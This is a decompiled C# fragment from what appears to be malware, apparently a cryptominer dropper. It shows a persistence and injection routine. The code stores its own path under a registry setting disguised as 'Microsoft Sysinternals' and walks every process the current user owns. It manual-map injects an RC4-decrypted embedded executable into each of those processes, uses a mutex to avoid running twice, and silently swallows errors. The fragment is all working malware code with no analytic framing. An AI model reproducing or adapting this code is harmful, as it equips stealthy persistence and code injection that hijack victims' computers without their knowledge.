// Token: 0x060000C3 RID: 195 RVA: 0x0000BBBC File Offset: 0x00009DBC
public static void LoadPersitenceEngine()
{
try
{
if (!Injection.InjectionIsRunning())
{
Interaction.SaveSetting("Microsoft", "Sysinternals", "9481", Application.ExecutablePath);
Process[] processes = Process.GetProcesses();
int num = processes.Length - 1;
for (int i = 0; i <= num; i++)
{
Process process = processes[i];
try
{
Path.GetFullPath(process.MainModule.FileName) + process.Id.ToString();
if (Operators.CompareString(Injection.GetCurrentProcessOwner(process.Handle), Environment.UserName, false) == 0)
{
Injection.DllPersistence(process.Id);
}
}
catch (Exception ex)
{
}
}
}
}
catch (Exception ex2)
{
}
}
// Token: 0x060000C1 RID: 193 RVA: 0x0000BAFC File Offset: 0x00009CFC
public static string GetCurrentProcessOwner(IntPtr processHandle)
{
IntPtr zero = IntPtr.Zero;
string result;
try
{
Injection.OpenProcessToken(processHandle, Injection.TOKEN_QUERY, ref zero);
WindowsIdentity windowsIdentity = new WindowsIdentity(zero);
result = windowsIdentity.Name.Substring(windowsIdentity.Name.IndexOf("\\") + 1);
}
catch (Exception ex)
{
Exception ex2 = ex;
throw ex2;
}
finally
{
if (zero != IntPtr.Zero)
{
Injection.CloseHandle(zero);
}
}
return(result);
}
// Token: 0x060000C2 RID: 194 RVA: 0x0000BB84 File Offset: 0x00009D84
public static bool InjectionIsRunning()
{
IntPtr intPtr = Injection.OpenMutex(2031617u, false, "83729184726481");
Injection.CloseHandle(intPtr);
return(!(intPtr == IntPtr.Zero));
}
// Token: 0x060000C0 RID: 192 RVA: 0x0000BA80 File Offset: 0x00009C80
public static void DllPersistence(int Pid)
{
if (!Injection.InjectionIsRunning())
{
InjectionMethod injectionMethod = InjectionMethod.Create(InjectionMethodType.ManualMap);
IntPtr value = IntPtr.Zero;
using (PortableExecutable portableExecutable = new PortableExecutable(Miner.Proper_RC4(Resources._2342342353245, Encoding.UTF8.GetBytes("sickmyduck"))))
{
value = injectionMethod.Inject(portableExecutable, Pid);
}
if (!(value != IntPtr.Zero))
{
injectionMethod.GetLastError();
}
}
}